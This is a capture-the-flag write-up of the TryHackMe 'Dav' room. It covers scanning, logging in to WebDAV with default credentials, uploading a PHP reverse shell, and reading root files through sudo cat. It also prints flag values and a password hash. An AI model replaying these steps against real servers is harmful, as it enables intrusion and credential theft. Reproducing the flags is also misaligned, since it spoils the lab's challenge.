This page looks best with JavaScript enabled

TryHackMe Writeup - Dav Room

 ·  β˜• 3 min read  ·  πŸ‘¨β€πŸ’» g4nd1v
Title https://tryhackme.com/room/bsidesgtdav
Description boot2root machine for FIT and bsides guatemala CTF
Difficulty Easy
Maker https://tryhackme.com/p/stuxnet

Nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
└─$ nmap -sC -sV -oA nmap/dav 10.10.88.48
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-22 18:51 EST
Nmap scan report for 10.10.88.48
Host is up (0.10s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

So basically only one port is open, that is 80 .

Also, on this port there is a default page of apache2.

Untitled

Next logical step will be to search for directories.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ gobuster dir -u 10.10.88.48 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.88.48
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/index.html           (Status: 200) [Size: 11321]
/server-status        (Status: 403) [Size: 299]
/webdav               (Status: 401) [Size: 458]

We found a directory named as /webdav but it is asking for username and password.

Untitled

After searching through internet about webdav, I found default credentials - https://xforeveryman.blogspot.com/2012/01/helper-webdav-xampp-173-default.html

user: wampp
pass: xampp

User flag

I found a file passwd.dav on server and in that file, I found this credentials
wampp:$apr1$Wm2VTkFL$PVNRQv7kzqXQIHe14qKA91 but I cannot be able to crack it.

I found a blog which is about exploiting webdav - https://vk9-sec.com/exploiting-webdav/ and uploading the rev shell using php.

1
2
3
4
5
6
7
8
└─$ cadaver http://10.10.188.137/webdav
Authentication required for webdav on server `10.10.188.137':
Username: wampp
Password:
dav:/webdav/> ls
Listing collection `/webdav/': succeeded.
        passwd.dav                            44  Aug 25  2019
dav:/webdav/> put php-reverse-shell.php

On visiting the website, we got the shell!!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
$ whoami
www-data
$ cd /home
$ ls
merlin
wampp
$ cd merlin
$ ls
user.txt
$ cat user.txt
449b40fe93f78a938523b7e4dcd66d2a

Root flag

we can use /bin/cat as sudo user.

1
2
3
4
5
6
7
8
www-data@ubuntu:/home/merlin$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (ALL) NOPASSWD: /bin/cat

Here is the /etc/shadow file and I have tried to use john in order to crack this hash. But it is of no use. Then I remember… we have cat as root.

Simply reading root file will also work!

1
2
3
www-data@ubuntu:/$ sudo cat /root/root.txt
sudo cat /root/root.txt
101101ddc16b0cdf65ba0b8a7af7afa5
Share on

g4nd1v
WRITTEN BY
g4nd1v
Pentester